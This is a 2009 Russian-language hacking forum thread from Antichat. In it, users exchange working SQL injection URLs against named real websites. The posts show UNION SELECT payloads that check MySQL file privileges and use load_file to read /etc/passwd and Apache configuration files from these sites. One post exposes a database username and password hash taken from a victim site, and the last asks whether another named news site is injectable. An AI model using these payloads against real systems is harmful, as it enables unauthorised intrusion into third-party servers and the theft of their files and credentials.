ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8271  
Старый 28.07.2009, 17:37
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Pashkela, спасбо.

load_file не хочет работать, ошибку выдает.
Можно ли как нибуть проверить , чтобы уточнить есть ли парва на чтение и запись файлов у юзера в БД 5 версии?
Ну чтобы выводило Y или N

Последний раз редактировалось SeNaP; 28.07.2009 в 17:39..
 
Ответить с цитированием

  #8272  
Старый 28.07.2009, 17:41
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

SeNaP
Так как ты написал
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'

если маджики включены, то перевести в hex, а с лоад_файл это не вполне точный метод, бывают ньюансы

Цитата:
Сообщение от Pashkela  
1. Пару раз встречал сайты, где значение file_priv в БД было N, а load_file работал
Это врятли

Последний раз редактировалось jokester; 28.07.2009 в 17:48..
 
Ответить с цитированием

  #8273  
Старый 28.07.2009, 18:21
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

jokester:
Код:
Это врятли
Код:
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,user()+from+mysql.user/*

Ответ: tltltl@info.umb.edu

http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*

Ответ: N

http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,load_file('/etc/passwd')/*

Ответ: содержимое /etc/passwd

---------------------------------------------------------------------------------------
Или еще может быть такая ситуация:

http://www.thiederman.com/products_detail.php?id=-10+union+select+1,file_priv,3,4,5,6+from+mysql.user--

Ответ: Couldn't execute query

Но запрос:

http://www.thiederman.com/products_detail.php?id=-10+union+select+1,load_file('/etc/passwd'),3,4,5,6--

 - положительный
Ну хз, может я чего не понимаю

По поводу пункта 1 пример:
Код:
http://www.kasparov.ru/subject.php?id=-74'+union+select+user()+from+mysql.user/*

Ответ: editor@192.168.1.70

http://www.kasparov.ru/subject.php?id=-74'+union+select+file_priv+from+mysql.user+where+user()='editor@192.168.1.70'/*

Ответ: Y

http://www.kasparov.ru/subject.php?id=-74'+union+select+load_file('/etc/httpd/conf/httpd.conf')/*

Ответ: содержимое /etc/httpd/conf/httpd.conf (в сорцах)
 
Ответить с цитированием

  #8274  
Старый 28.07.2009, 18:30
Аватар для The_HuliGun
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

Код:
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*
Звезды говорят о другом...

Код:
User name: tltltl@info.umb.edu
Fields user:password:file_Priv:host
[43]:tltltl:2e52490f15206ead:Y:%
Вот так
Код:
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user+where+user='tltltl'/*

Последний раз редактировалось The_HuliGun; 28.07.2009 в 18:35..
 
Ответить с цитированием

  #8275  
Старый 28.07.2009, 18:33
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

))) Ок, был неправ, погорячился))

Всегда надо юзать where user=, а лучше не заморачиваться и сразу load_file

Последний раз редактировалось Pashkela; 28.07.2009 в 18:48..
 
Ответить с цитированием

  #8276  
Старый 28.07.2009, 18:50
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Pashkela ты издеваешься что-ли?

Как по твоему что выводит этот запрос?
Цитата:
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*
 
Ответить с цитированием

  #8277  
Старый 28.07.2009, 18:57
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Ааааа, я больше не буду)) Просто большиство, насколько я знаю, where не пользуют, поэтому и привёл пример, для наглядности
 
Ответить с цитированием

  #8278  
Старый 28.07.2009, 19:02
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Без where как раз это не имеет смысла делать. Непонятно что за запись тебе выдаст база.

Ну или хотя-бы concat_ws(0x3a,user,file_priv) а там уже искать своего юзера
 
Ответить с цитированием

  #8279  
Старый 28.07.2009, 19:38
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Код:
select file_priv from mysql.user where user=substring_index(user(),0x40,1) and host=substring_index(user(),0x40,-1)
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #8280  
Старый 29.07.2009, 02:56
Аватар для bons
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

Код:
http://censor.net.ua/go/offer/ResourceID/12235-4.html
http://censor.net.ua/go/offer/ResourceID/12231.html
совпадают, то есть вроде как признак sql инъекции. Но более ничего не подтверждает это. Возможно ли тут запроса внедрение?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ